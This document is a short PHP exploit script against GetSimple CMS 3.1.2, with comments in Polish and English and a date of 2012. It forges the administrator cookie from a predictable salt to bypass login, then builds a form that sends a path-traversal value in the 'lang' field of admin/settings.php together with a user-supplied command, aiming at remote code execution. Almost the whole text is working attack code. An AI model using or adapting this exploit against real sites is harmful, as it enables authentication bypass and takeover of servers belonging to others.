<?php // -------------------------------- // iHaiHa-vs-hosting2rce.php // -------------------------------- // 26.12.2o12 // // Specjal thanks to ihaiha team for // 'point of view'. // // cookie() grepped from GetSimple 3.1.2, THANKS! ;] // just for 'knowing the cookie'. function create_cookie() { global $USR,$SALT,$cookie_time,$cookie_name; $saltUSR = $USR.$SALT; $saltCOOKIE = sha1($cookie_name.$SALT); setcookie($saltCOOKIE, sha1($saltUSR), time() + $cookie_time,'/'); setcookie('GS_ADMIN_USERNAME', $USR, time() + $cookie_time,'/'); } // get-IT-simple-ihaiha-kod-yeah function getsimple_cookie(){ // potrzebujemy: $authenticated = true; $USR = 'admin'; //$_POST['userid']; // admin? $ver_no_clean = '3.1.2'; $SITEURL = '/your/GetSimple_3.1.2/admin/settings.php'; //$_POST['siteurl']; $SALT = sha1($SITEURL); $cookie_time = '7200'; $site_full_name = 'GetSimple'; $name_url_clean = strtolower(str_replace(' ','-',$site_full_name)); $cookie_name = strtolower($name_url_clean) .'_cookie_'. $ver_no_clean; echo 'It should be interesting that we can (re)generate valid cookie<br>'; echo 'and login without password, right? <br><br><b>Generated cookie: '; echo $cookie_name . '<br></b>'; echo '<br>Anyway: this simple code exploits vulnerability in :<br>'; echo '<b>admin/settings.php</b>:'; if( $authenticated ) { # YES - set the login cookie, then redirect user to secure panel // create_cookie(); setcookie('GS_ADMIN_USERNAME', $USR, time() + 3600,'/'); echo '<form method="post" action="'. $SITEURL .'">'; echo '<input type="hidden" name="username" value="' . $USR . '">'; echo '<input type="hidden" name="pwd" value="ihaihaiha">'; // sample; as a hardcoded (wrong anyway) pass echo '<input type="hidden" name="lang" value="en_US/../../../../../../../../../../tmp/&cmd='.$_POST['cmd'].'">'; echo '<br>So add come cmd: <br>'; echo 'cmd: <input type="text" name="cmd">'; echo '<input type="submit" value="teraz">'; } else { echo 'Nope. :C'; } } // end of getsimple_cookie() getsimple_cookie();